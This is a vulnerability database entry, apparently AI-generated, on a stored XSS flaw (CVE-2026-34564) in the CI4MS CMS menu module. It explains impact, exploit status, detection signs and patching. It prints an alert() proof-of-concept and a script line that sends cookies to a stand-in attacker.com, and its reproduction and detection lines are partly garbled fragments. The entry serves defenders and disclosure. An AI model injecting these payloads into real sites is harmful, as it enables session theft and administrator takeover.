
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34564 is a stored DOM-based cross-site scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the Menu Management module's Pages section, where user-controlled input is stored server-side and rendered without proper output encoding in both administrative interfaces and public-facing navigation menus. The vulnerability was published on March 31, 2026, and patched in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) (Github Advisory, CI4MS Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where the application fails to apply HTML entity encoding or input sanitization before storing and rendering page-related data added to navigation menus. The vulnerable endpoint is /backend/menu/, where page entries are stored without sanitization and later rendered using unsafe DOM manipulation methods (e.g., .html(), innerHTML) or equivalent server-side templating sinks. An attacker with low-privilege access (e.g., any authenticated user with Menu Management permissions) can inject a persistent JavaScript payload that executes in the browsers of all users — including administrators — who view the affected menu. A proof-of-concept payload such as <img src=x onerror=alert(document.domain)> is documented in the advisory (Github Advisory, CI4MS Advisory).
Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of all users who view the affected navigation menu, including administrators. This can lead to full administrator account takeover, privilege escalation across all roles, session cookie theft, unauthorized actions performed on behalf of victims, and redirection to malicious sites. Because the payload is injected into a globally rendered navigation component, the entire application is effectively compromised upon exploitation (Github Advisory, CI4MS Advisory).
A proof-of-concept exploit with step-by-step reproduction instructions is publicly available in the GitHub Security Advisory, including a video PoC hosted externally. The advisory classifies the exploit confidence as high, with the PoC targeting the /backend/menu/ endpoint. There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.046% (0.000460), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA KEV catalog (Github Advisory, CI4MS Advisory).
/backend/menu/ and open the Menu Management section.<img src=x onerror=alert(document.domain)> or a more sophisticated payload designed to steal session cookies (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)./backend/menu/ or public-facing pages./backend/menu/ containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, alert() in page-related parameters; repeated access to the menu endpoint from multiple user accounts in a short timeframe.<img, <script>, onerror=, javascript:) in page title or URL fields rather than plain text.The vendor has released a patch in CI4MS version 0.31.0.0, which includes global input validation, enhanced XSS protection, and CSRF token improvements. All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations: restrict Menu Management access to trusted administrators only; implement a strict Content Security Policy (CSP) to limit unauthorized script execution; set HttpOnly, SameSite, and Secure attributes on session cookies; and audit existing stored menu entries in the database for malicious payloads (Github Advisory, CI4MS Release).
The vulnerability was reported by researchers bugmithlegend and peeefour and published by the CI4MS maintainer bertugfahriozer on March 31, 2026. The advisory was picked up by automated CVE tracking feeds including CVEFeed, VulDB, and Bluesky CVE bots shortly after publication. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability aggregator listings (CI4MS Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."